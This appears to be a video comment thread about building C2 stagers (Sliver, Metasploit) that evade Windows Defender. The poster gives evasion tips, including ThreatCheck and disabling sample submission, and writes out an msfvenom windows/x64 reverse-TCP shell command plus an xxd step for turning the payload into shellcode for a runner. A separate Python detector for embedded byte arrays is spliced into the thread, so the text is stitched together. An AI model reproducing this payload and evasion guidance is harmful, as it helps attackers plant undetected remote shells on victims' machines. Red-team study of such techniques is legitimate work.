You explain everything so well, I was going to play around with the stagers myself and this video helps a ton.
Amazing work!
Hello, nice video bro, but I don't know where to find the scripts remove_bad_strings.sh and ratoon_mod_csharp_runner.sh. Thanks a lot for the content.
What's your preferred best C2? I'm in between Mythic, Sliver, Havoc to start learning?
I flip flop between Metasploit, PowerShell-Empire, Villain, and Sliver.
For improving my knowledge of the C2 or testing custom tooling, like evasion.
Learning by tinkering with different C2 frameworks and seeing what works for you.
Each framework has different pros and cons.
If you are not sure what you want to try next, there is a large Google sheet of many different C2 frameworks.
The link to that can be found if you search for "The C2 Matrix" or find the link at howto.thec2matrix.com/
Hello, thank you for the video. In my labs, I have the impression that Defender catches the stager entering despite AES encryption from stager to listener. Is anyone else in this situation? A solution?
I would suggest using tools like ThreatCheck or DefenderCheck to figure out what part of your payload is being flagged.
Also, if you're using a staged payload, it could be that the second stage is getting flagged instead.
I'm not sure if the problem you are having is based on the first stage of the payload being caught by Defender when dropped to disk or while it's running.
@@0reoByt3 I am caught during step 2 immediately after the beacon connection is established; step 1 is undetectable. I have however configured my listener with the AES encryption, and the keys are in my C# code of step one. Thank you for your feedback.
@@0reoByt3 Oh, I found the fault: the problem is the variables of my C# code. I would like to convert my C# code into .bin in order to use my encrypter. Do you have an idea on this? Thank you.
@@0reoByt3 Update: my stage1 is undetectable, as soon as the connection is established I lose it 1 second later without Defender reporting a virus.
You can take compiled binaries and extract the shellcode and store it as a raw .bin file. But that's usually done when you're processing just the shellcode of the payload with encryption or some other form of obfuscation.
Hi, how do I convert the data to an exe? Can you give me the script?
The script just uses the xxd command to extract all the shellcode bytes of the desired payload in raw/data format.
xxd -i file.bin
Then it does extra stuff to obfuscate, puts it into a simple shellcode runner, and compiles it into a .exe.
There are more ways than just xxd to extract the shellcode array of the payload. You can test this with msfvenom,
since Sliver shellcode is too long to read unless you filter with the head command.
msfvenom -p windows/x64/shell_reverse_tcp -f raw lhost=eth0 lport=8443 -o msf_raw.bin
xxd -i msf_raw.bin
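As an added defender-side example (not code from the video, the commenter's script, or any of the tools named above): a small Python heuristic that scans C/C# source for the large, high-entropy byte-array initialisers that `xxd -i` leaves behind when a raw .bin is pasted into a runner. The sample source, array names and thresholds are constructed for illustration.

```python
# Static heuristic: flag long, high-entropy byte arrays embedded in C/C# source,
# the artifact `xxd -i` produces when a raw .bin is pasted into a runner.
import math
import re
from collections import Counter
from dataclasses import dataclass

# Matches C `unsigned char name[] = { ... }` and C# `byte[] name = new byte[] { ... }`.
ARRAY_RE = re.compile(
    r'(?:unsigned\s+char|byte\s*\[\s*\]|char)\s+(\w+)\s*(?:\[\s*\])?\s*=\s*'
    r'(?:new\s+byte\s*\[\s*\]\s*)?\{([^}]*)\}',
    re.DOTALL,
)
HEX_BYTE_RE = re.compile(r'0x([0-9a-fA-F]{1,2})')

@dataclass
class Finding:
    name: str
    byte_count: int
    entropy: float
    flagged: bool

def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 means every byte value occurs equally often."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def find_embedded_byte_arrays(source: str, min_bytes: int = 64,
                              min_entropy: float = 6.0) -> list[Finding]:
    """One Finding per byte-array initialiser; `flagged` marks arrays that are
    both long and high-entropy (lookup tables are short, strings are low-entropy)."""
    findings = []
    for name, body in ARRAY_RE.findall(source):
        data = bytes(int(h, 16) for h in HEX_BYTE_RE.findall(body))
        ent = shannon_entropy(data)
        findings.append(Finding(name, len(data), ent,
                                len(data) >= min_bytes and ent >= min_entropy))
    return findings

# Constructed sample: the first array mimics `xxd -i` output (bytes 0..255,
# not real shellcode); the second is a short lookup table that should pass.
SAMPLE_SOURCE = (
    "unsigned char msf_raw_bin[] = {\n  "
    + ", ".join(f"0x{b:02x}" for b in range(256))
    + "\n};\nunsigned int msf_raw_bin_len = 256;\n"
    "static const unsigned char crc_table[] = { 0x00, 0x07, 0x0e, 0x09 };\n"
)
```

Run `find_embedded_byte_arrays` over a source tree in CI or code review; a flagged array is a prompt to ask where the bytes came from, not a verdict on its own.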
@@0reoByt3 Thanks so much !
Wow 🎉
This works on Windows 11 as well, I guess?
I would have to set up another Windows 11 dev machine and try. Last time I tried to run 11 as a virtual machine it ran like junk. My Windows 10 box has an updated version of Windows Defender and other signatures, so I usually test with that. Of course, disable the automatic sample submission and so on.
@@0reoByt3 Ah nice. Though I followed this guide but it didn't really work. Not sure why though.
@@F0rc3Tv Some people had similar results with Windows 11. When Alh4zr3d was doing his lazy AV evasion stream months ago with just msfvenom tooling, he streamed on Windows 10 but was caught on Windows 11.
@@F0rc3Tv There is always more research that can be done.
@@0reoByt3 yeah ofc